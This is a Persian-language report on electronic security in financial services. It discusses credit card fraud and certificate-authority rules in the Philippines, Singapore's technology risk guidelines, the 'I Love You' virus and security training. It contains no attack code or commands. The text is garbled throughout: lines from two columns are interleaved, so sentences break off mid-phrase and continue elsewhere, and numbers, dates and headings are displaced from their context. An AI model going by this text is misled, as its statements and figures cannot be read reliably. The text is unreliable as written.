ﺑﺮﻧﺎﻣﺔ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻭﻟﺖ ﺑﻪ ﺍﺟﺮﺍ ﮔﺬﺍﺷﺘﻪ ﺷﺪ ﻛﺎﺭﻫــﺎﻱ ﺧــﻮﺩ ﺣــﺪﻭﺩ ۲۰ﻣﻴﻠﻴــﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜــﺎ ﺳــﻬﺎﻡ ﺍﺯ
ﻭ ﺩﻭﻟﺖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺳـﺮﻣﺎﻳﻪﮔــﺬﺍﺭﺍﻥ ﺧﺮﻳـﺪﻩ ﺑﻮﺩﻧــﺪ .ﺩﺭ ﻭﺍﻛــﻨﺶ ﺑـﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ،
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺳﺎﻳﺒﺮ ٢٣٤ﺭﺍ ﺍﺯ ﺩﺍﻳﺮﺓ ﺗﺼﻮﻳﺐ ﮔﺬﺭﺍﻧﺪ. ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓـﺖ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺟﺒﺎﺭ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ .ﺩﺭ ﺍﻭﻝ ﺩﺳﺎﻣﺒﺮ ﺳﺎﻝ
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ
،۲۰۰۲ﮔﻮﺍﻫﻲﻫﺎﻱ ﺧﺼﻮﺻﻲ "ﻓﺎﻗﺪ ﺍﻋﺘﺒـﺎﺭ" ﺍﻋـﻼﻡ ﺷـﺪﻧﺪ ﻭ ﺍﺯ
ﻞ
ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ )ﻣﺜﻞ ﻫﺮ ﻛﺸﻮﺭ ﺩﻳﮕﺮﻱ( ﺑﻪ ﻳﻚ ﻣﻌـﻀ ﹺ
ﺍﺳﺎﺳﻲ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺩﺍﺭﺍﻱ ۲ﺗـﺎ ۳ﻣﻴﻠﻴـﻮﻥ ﺁﻥ ﭘﺲ ﺗﻨﻬﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ
) ٢٣٣(LCAsﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻣﻌﺘﺒﺮ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪﻧﺪ ﻭ ﺗﺎ ﻣﺎﻩ
ﺩﺍﺭﻧــﺪﺓ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺍﺳــﺖ ﻭ ﺣــﺪﻭﺩ ۱۷ﺑﺎﻧــﻚ ،ﺧــﺪﻣﺎﺕ
ﻣﻲ ﺳﺎﻝ ۲۰۰۳ﻧﻴﺰ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺠﺪﺩ ﻗـﺮﺍﺭ
ﺍﻋﺘﺒﺎﺭﻱ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺳﺎﻝ ﭼﻨﺪﻳﻦ ﻣﻴﻠﻴـﻮﻥ
ﻣﻲ ﮔﺮﻓﺘﻨﺪ .ﺿﺮﻭﺭﻱ ﺷـﺪ ﻛـﻪ ﻫﻤـﺔ ﺷـﺮﻛﺘﻬﺎﻱ ﻭﺍﺳـﻄﻪﺍﻱ ﺍﺯ
ﺗﺒﺎﺩﻝ ﺗﺠﺎﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ .ﺗﺨﻤﻴﻦ ﺯﺩﻩ ﺷﺪﻩ ﻛﻪ
ﻧﻮﺍﻣﺒﺮ ۲۰۰۲ﻭ ﻣﺆﺳﺴﺎﺕ ﻛﻮﭼﻜﺘﺮ ﺍﺯ ﮊﺍﻧﻮﻳﻪ ۲۰۰۳ﺑـﻪ ﺑﻌـﺪ ،ﺩﺭ
ﺣﺪﻭﺩ ۴۰۰ﻣﻴﻠﻴﻮﻥ ﭘﺰﻭ )ﻣﻌﺎﺩﻝ ۸ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ( ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ
ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ
ﻣﺎﻟﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺻﻮﺭﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﺍﻋﺘﺒــﺎﺭﻱ ﻧــﺴﺒﺖ ﺩﺍﺩ .ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺧــﻮﺩﭘﺮﺩﺍﺯ ﻧﻴــﺰ ﺑﻄــﻮﺭ
ﺑﺨﺶ ﺳﻮﻡ
ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺳﺮﺍﺳـﺮ ﻛـﺸﻮﺭ ﭼﻴـﺰﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺷﺖ ﺩﺭ ﺑﻬﺎﺭ ﺳﺎﻝ ۲۰۰۳ﺧﻂﻣﺸﻲﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ
ﺣﺪﻭﺩ ۱۰ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ. ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﻨﺪ .ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﺮ
ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻔﻴﺪ ﺻﻨﻌﺖ ،ﺑﺎ ﻛﻤﻚ ﻧﻬﺎﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ،ﻭ
ﺳﻮﻣﻴﻦ ﻣﻮﺿﻮﻉ ﺑﺤﺚ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑﺎﻧﻜﻬـﺎ ﺭﺍ
ﺑﺮ ﻣﺒﻨﺎﻱ ﭼﻜﻴﺪﺓ ﺟﻠﺴﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎﻱ ﻓﻌﺎﻝ ﺻـﻨﻌﺘﻲ
ﻣﺠﺒﻮﺭ ﺳﺎﺧﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﺗـﻼﺵ
ﻭ ﻣﻘﺎﻣﺎﺕ ﺩﻭﻟﺘﻲ ﻫﺪﺍﻳﺖ ﻣﻲ ﺷﻮﺩ .ﻳﻜـﻲ ﺍﺯ ﭘﺮﺳـﺸﻬﺎﻱ ﺍﺻـﻠﻲ
ﺟﻬﺖ ﺍﻓﺰﺍﻳﺶ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ.
ﺳﻨﮕﺎﭘﻮﺭ ﻛﻪ ﺩﺍﺭﺍﻱ ﺗﻨﻬـﺎ ﻳـﻚ ﻧﻬـﺎﺩ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﻫﻤﺎﻧﻨﺪ ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺟﻬﺎﻥ ،ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻢ ﻫﻨﻮﺯ ﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ ﻣﻲﺑﺎﺷﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭼﮕﻮﻧﻪ ﺩﻭﻟﺘﻲ ﺑﻪ ﺑﺰﺭﮔ ﹺ
ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﻪ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ .ﻓﻴﻠﻴﭙـﻴﻦ ﺩﺭ ﺍﻳـﻦ ﺭﺍﺳـﺘﺎ ﺑـﻪ ﺑﺎ ﺩﺍﺷﺘﻦ ﻣﺮﺍﺟﻊ ﻣﺘﻌﺪﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ،ﻣﻲﺗﻮﺍﻧﺪ ﺿﻮﺍﺑﻂ ﺧﻮﺩ ﺭﺍ
ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻫﺸﺖ ﺭﻛﻦ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ ﺑﺼﻮﺭﺕ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻋﻤﺎﻝ ﻛﻨﺪ.
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺰ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ :ﭘﻴﻮﻧﺪ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ
ﺭﻭﺷﻬﺎﻱ ﺍﻋﻤﺎﻝ ﺿـﻮﺍﺑﻂ ،ﺑﺮﻗـﺮﺍﺭﻱ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﻓﻴﻠﻴﭙﻴﻦ
ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ،ﻭ ﻧﻴﺰ ﺑﻬﺒﻮﺩ ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻱ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ
ﺑﺤﺚ ﻓﻴﻠﻴﭙﻴﻦ ﺭﻭﻱ ﻧﺘﺎﻳﺞ ﺳﻪ ﻧﮕـﺮﺵ ﻣﻤﻜـﻦ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺷـﺪ
ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ .ﺑﺎ ﺍﻳﻨﻬﻤﻪ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻨـﻮﺯ ﻧﻴﺎﺯﻣﻨـﺪ
ﻓﺰﺍﻳﻨﺪﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ .ﺍﻳﻦ ﺳـﻪ ﻧﮕـﺮﺵ
ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺧﺒــﺮﺓ ﻗــﺎﻧﻮﻧﻲ ،ﺑﺨــﺼﻮﺹ ﺑــﺮﺍﻱ ﺩﺍﺩﮔﺎﻫﻬــﺎﻱ
ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ ﮔﺴﺘﺮﺵ ﻭﻳﺮﻭﺳﻬﺎ )ﻣﺜـﻞ ﻭﻳـﺮﻭﺱ ،(I Love You
ﺗﺨﺼﺼﻲ ﺍﺳﺖ .ﺍﺯ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻫـﺎﻱ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ
ﺳﺮﻗﺖ ﻣﺪﺍﻭﻡ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﻧﻴﺰ ﺣﺎﺩﺛﺔ ﻳﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ.
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺁﻣﻮﺯﺵ ﻛﻠﻴﺔ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ
ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛـﺸﻮﺭ ﻓﻴﻠﻴﭙـﻴﻦ ﺍﺯ ﺣﺎﺩﺛـﺔ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑـﺮﺍﻱ
ﻣﺎﻟﻲ ﺷﺎﻣﻞ ﻣﺸﺘﺮﻳﺎﻥ ،ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ،ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ
ﺗﺸﺮﻳﺢ ﻣﺤﺎﺳﺒﺎﺕ ﺩﻭﻟﺖ ﺧﻮﺩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﻲ
ﺧﺪﻣﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﺍﻗﺘﺼﺎﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ.
ﻓﻴﻠﻴﭙﻴﻨﻲ ﻫﺎ ﺩﻭ ﺳﺆﺍﻝ ﻋﻤﺪﻩ ﻣﻄﺮﺡ ﻛﺮﺩﻧـﺪ (۱ :ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ
ﺩﺭ ﻓﻴﻠﻴﭙــﻴﻦ ،ﮔــﺴﺘﺮﺵ ﻭﻳــﺮﻭﺱ " "I Love Youﺑــﺴﺮﻋﺖ
ﭼﮕﻮﻧﻪ ﻣﻴﺎﻥ ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩﻫﺎ ﻭ ﺣﻔﻆ ﻣﺴﺎﺋﻞ ﻣﺤﺮﻣﺎﻧﻪ ،ﺗـﻮﺍﺯﻥ
ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑـﻪ ﻭﺍﻛـﻨﺶ ﻭﺍﺩﺍﺭ ﻛـﺮﺩ .ﺍﻳـﻦ ﺣﺎﺩﺛـﻪ ﺍﺯ ﺁﻥ
ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ؟ ﻭ (۲ﺟﺎﻳﮕﺎﻩ ﭘﻠـﻴﺲ ﺑـﻴﻦﺍﻟﻤﻠـﻞ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ
ﺟﻬــﺖ ﻛــﻪ ﺿــﻌﻔﻬﺎﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺭﺍ ﻓــﺎﺵ
ﺟﺮﺍﺋﻢ ﺟﺰﺍﻳﻲ ﭼﻴﺴﺖ؟
ﻣــﻲﺳــﺎﺧﺖ ﺍﺯ ﺍﻫﻤﻴــﺖ ﻭﻳــﮋﻩﺍﻱ ﺑﺮﺧــﻮﺭﺩﺍﺭ ﺑــﻮﺩ .ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ
ﻳﻚ ﺗﻌﺮﻳﻒ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎﻱ ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺑﺮ ﺿﺮﻭﺭﺕ ﺁﻣﻮﺯﺷﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ
ﻭ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺯﻣﻴﻨﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ ،ﻭ ﻧﻬﺎﻳﺘـﹰﺎ
ﺑﺨﺶ ﺳﻮﻡ
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﻫﺎ ﺗـﺪﻭﻳﻦ ﺳﻮﻡ ،ﻋﺪﻡ ﮔـﺰﺍﺭﺵ ﺭﻭﻳـﺪﺍﺩﻫﺎ ﻳـﻚ ﻣـﺎﻧﻊ ﺟـﺪﻱ ﺑـﺮﺍﻱ ﺩﺭﻙ
ﻛﻨﻨﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﻣﺴﻴﺮ ﺗﻤﺎﻡ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﺑـﺮﺍﻱ ﺁﻧﻬـﺎ ﻣﺤﺪﻭﺩﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻫﻨﻮﺯ ﺑﻲ ﻣﻴﻠـﻲ ﻗﺎﺑـﻞ
ﻓــﺮﺍﻫﻢ ﻣــﻲﺁﻭﺭﺩ .ﺩﺭ ﭼﻨــﻴﻦ ﺑﺮﻧﺎﻣــﻪﺍﻱ ﺑﺎﻳــﺪ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ ﺗﻮﺟﻬﻲ ﻧﺴﺒﺖ ﺑﻪ ﮔﺰﺍﺭﺵ ﻋﻤﻮﻣﻲ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﺁﮔﺎﻫﻲﻳﺎﻓﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﭼﻬﺎﺭﻡ ،ﻋﻼﻭﻩ ﺑﺮ ﺑـﻲﻋﻼﻗﮕـﻲ ﻣﺆﺳـﺴﺎﺕ ﺑـﻪ ﮔـﺰﺍﺭﺵﻛـﺮﺩﻥ
ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ. ﺭﺧﺪﺍﺩﻫﺎ ،ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻧﻴـﺰ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻋﻠﻴﺮﻏﻢ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﺑﺘﻜﺎﺭﻱ ،ﻫﻨﻮﺯ ﻫﻢ ﺍﻣﻨﻴﺖ ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩ ﺍﺳﺖ.
ﺑﻪ ﺍﻣﺮﻱ ﺳﺎﺩﻩ ﺗﺒﺪﻳﻞ ﻧﺸﺪﻩ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﭽﻨﺎﻥ ﻣﺮﺍﻗﺒﺖ ﻭ ﺳﺮﺍﻧﺠﺎﻡ ﺁﻧﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻧﻘﺶ ﻣﺤﻮﺭﻱ ﺑﺎﺯﻱ ﻣﻲﻛﻨﻨـﺪ
ﺁﻣﻮﺯﺵ ﻣﺪﺍﻭﻡ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎﻱ ﺟﺪﻳﺪ ﻣﺒﺎﺣـﺚ
ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻲﺗﺠﺮﺑﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷـﺒﻜﻪ ﺭﺍ ﺯﻳـﺮ
ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻮﺟﻪ ﺑﻴﺸﺘﺮﻱ ﻣﻲﻃﻠﺒﻨـﺪ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ:
ﺳﺆﺍﻝ ﺑﺒﺮﺩ؛ ﻭ ﻟﺬﺍ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺁﮔﺎﻫﻲ ﺗﻤﺎﻡ ﺍﻓـﺮﺍﺩ ﻧـﺴﺒﺖ
ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ،ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢ ﻳـﺎﺏ ،ﻭ
ﺑﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ.
ﺩﺭﺳﺘﻲ ﻣﺪﻳﺮﻳﺖ ﻧـﺸﻮﻧﺪ ،ﻧـﺎﮔﺰﻳﺮ ﺍﻋﺘﻤـﺎﺩ ﻋﻤـﻮﻣﻲ ﻧـﺴﺒﺖ ﺑـﻪ
ﻓﻨﺎﻭﺭﻱ ﺧﺪﺷﻪﺩﺍﺭ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺑﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ،ﺑﺮﺍﻱ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳﻴﺎﺭ:
ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﻮﺡ ﺑﺎﻻﺗﺮﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﮔﺎﻣﻬﺎﻱ
ﺩﺳﺘﺎﻭﺭﺩﻫﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪ ﻣﺘﻌﺪﺩ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﺮﺩﺍﺷﺖ:
ﺩﺭ ﺳﺎﻝ GSM ،۲۰۰۲ﺣﺪﻭﺩ ۷۸۷ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺍﻭﻝ ،ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ،ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﺳﺎﻳﺮ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺑـﺎﺯﺍﺭ
ﺩﻧﻴﺎ ﺩﺍﺷﺖ .ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﺑﺎ ﺳﺮﻋﺘﻲ ﻣﻌﺎﺩﻝ ﺳﻪ ﺑﺮﺍﺑﺮ ﺳﺮﻋﺖ ﺑﺎﻳﺪ ﺩﺭ ﺟﻬﺖ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﮔﺴﺘﺮﺵ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﺍﻣﻨﻴـﺖ
ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺍﺳﺖ .ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﻧﻴﺰ ﻣﺎﻧﻨـﺪ ﺳـﺎﻳﺮ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻗﺪﺍﻡ ﻛﻨﻨﺪ.
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻧﺴﺒﺖ ﺑﻪ ﺗﻜـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣﺜـﻞ
ﺩﻭﻡ ،ﻫﻤﻜﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﺮﻱ ﻋﺎﺩﻱ ﻭ ﻫﻤﻴﺸﮕﻲ ﺗﺒـﺪﻳﻞ ﺷـﻮﺩ؛
ﺗﺮﺍﻭﺍﻫﺎ ،ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺁﺳـﻴﺐﭘـﺬﻳﺮ
ﺑﺨﺼﻮﺹ ﺑﺎ ﻋﻨﺎﻳﺖ ﺧﺎﺹ ﺑﻪ ﺭﻓﻊ ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﻣﺘﻮﺟـﻪ
ﻣﻲﺑﺎﺷﺪ .ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧـﺼﻤﺎﻧﺔ ﺍﻳﻨﺘﺮﻧـﺖ ،ﭘﺎﺷـﻨﺔ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻋﻤﻮﻡ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺖ.
ﻻ ﺍﺗـﺼﺎﻝ ﺑـﻲﺳـﻴﻢ ﺁﺷﻴﻞ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ .ﻣﻌﻤـﻮ ﹰ
ﺿــﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘــﺔ ﺯﻧﺠﻴــﺮ ﺍﻣﻨﻴﺘــﻲ ﻣﺤــﺴﻮﺏ ﻣــﻲﺷــﻮﺩ. ﺳﻮﻡ ،ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺁﻣﻮﺯﺷـﻲ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﻭ ﻣﻤﻴـﺰﺍﻥ ﻗـﺴﻤﺖ
